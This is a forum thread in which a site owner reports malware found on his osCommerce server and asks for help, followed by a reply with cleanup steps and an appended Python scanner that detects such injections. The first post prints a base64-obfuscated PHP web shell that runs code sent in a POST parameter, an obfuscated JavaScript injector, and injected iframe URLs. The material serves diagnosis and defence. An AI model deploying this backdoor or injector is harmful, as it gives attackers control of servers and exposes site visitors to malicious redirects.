I found some mal looking php, images and other junk on my server advice/help needed

Discussion in 'PHP' started by theaudiowiz, Feb 16, 2010.

  1. #1
    I was looking through and making some edits on some PHP files on my hosted osCommerce. In the html folder I found strangely named folders like admissible evidence, adultery, bail, script etc. etc. In this html folder there are also two images, named streaming superstintial and tax exempt property; these images are Viagra ads once they are opened, in JPG format. I also noticed all of my index.php files had iframe commands with URLs like http://4analytics.ws/in.cgi?8 ihrhrhrhereo.cn/in.cgi?2 as well as some others. There was also a strange cuckoo.asp file with what appeared to be a 404 page? Then a PHP file with the following:
    <?PHP eval(base64_decode("aWYoaXNzZXQoJF9HRVRbInBhcnQiXSkpIHsgaWYoJF9HRVRbInBhcnQiXT09InNlYyIpIGVjaG8gInBhcnRnb29kIjsgfQplbHNlIGlmKGlzc2V0KCRfUE9TVFsibWFpbiJdKSkgZXZhbCh1cmxkZWNvZGUoJF9QT1NUWyJtYWluIl0pKTs=")); ?>
    Then another PHP file named political-esquire.php with this:
    <script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%297Glxqp%297I%294E%297Glieh%297I%294E%297Gwgvmtx%2964perkyeki%297H%2966NezeWgvmtx525%2966%2964x%7Dti%297H%2966xi%7Cx3nezewgvmtx%2966%297I%294Epsgexmsr2vitpegi%296%3C%2966lxxt%297E33%7B%7B%7B2py%7C1tlevqeg%7D2gsq%2966%296%3D%297F%294E%297G3wgvmtx%297I%294E%297G3lieh%297I%294E%297Gfsh%7D%297I%294E%297G3fsh%7D%297I%294E%297G3lxqp%297I4')</script>
    What is all this? My first thought is the images look a lot like the spam email images everyone receives. Was someone using my server for mal mail or spam or what? I'd like to find some evidence to link a recent SEO guy that was given FTP access; we found him on guru and fired him, now I see him or someone working with him may be responsible. Can anyone help?
     
    theaudiowiz, Feb 16, 2010
  2. systematical

    #2
    Yeah, I noticed some similar ugly junk on my server.

    1. Change all passwords to your server. If you ever sent out passwords for your server via email or anything else, delete all traces and change passwords on those accounts as well.

    2. Search your files for other code like this and remove it.

    3. Contact your hosting provider and notify them.

    Those are the steps I took.
     
    systematical, Feb 16, 2010
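
One way to carry out step 2 of the reply above (searching the files for similar code), as an added example that is not part of either post: a Python scanner that walks a web root, flags the three injection styles described in the first post (eval of base64-decoded PHP, document.write(unescape(...)) script blocks, and remote iframes), and decodes any base64 argument statically so it can be read without being executed. The rule names, the extension list and the sample web root built in `demo()` are assumptions constructed for illustration.

```python
import base64
import re
import tempfile
from pathlib import Path

RULES = {
    "php-eval-base64": re.compile(rb"eval\s*\(\s*base64_decode\s*\(\s*[\"']([A-Za-z0-9+/=\s]+)[\"']", re.I),
    "js-write-unescape": re.compile(rb"document\.write\s*\(\s*unescape\s*\(", re.I),
    # Flags every remote iframe; legitimate ones need manual review.
    "iframe": re.compile(rb"<iframe[^>]+src\s*=\s*[\"']?(https?://[^\"'\s>]+)", re.I),
}
EXTENSIONS = {".php", ".html", ".htm", ".js", ".asp"}  # assumed list, extend as needed

def scan_file(path):
    """Return (rule, detail) findings; content is only read, never executed."""
    data = path.read_bytes()
    findings = []
    for rule, rx in RULES.items():
        for m in rx.finditer(data):
            detail = ""
            if rule == "php-eval-base64":  # decode statically for review
                try:
                    detail = base64.b64decode(m.group(1)).decode("utf-8", "replace")
                except ValueError:
                    detail = "<undecodable>"
            elif rule == "iframe":
                detail = m.group(1).decode("ascii", "replace")
            findings.append((rule, detail))
    return findings

def scan_tree(root):
    """Map relative path -> findings for every matching file under root."""
    hits = {}
    for p in sorted(Path(root).rglob("*")):
        if p.is_file() and p.suffix.lower() in EXTENSIONS:
            found = scan_file(p)
            if found:
                hits[p.relative_to(root).as_posix()] = found
    return hits

def demo():
    """Scan a constructed sample web root (harmless stand-in payloads)."""
    blob = base64.b64encode(b'echo "constructed sample";').decode()
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "index.php").write_text('<?php ?>\n<iframe src="http://injected.example/in.cgi?1"></iframe>')
        (root / "odd.php").write_text(f'<?PHP eval(base64_decode("{blob}")); ?>')
        (root / "clean.php").write_text('<?php echo "hello"; ?>')
        return scan_tree(root)
```

Run `scan_tree()` against a copy of the web root rather than the live site, and compare flagged files with a known-good copy of the application before removing anything.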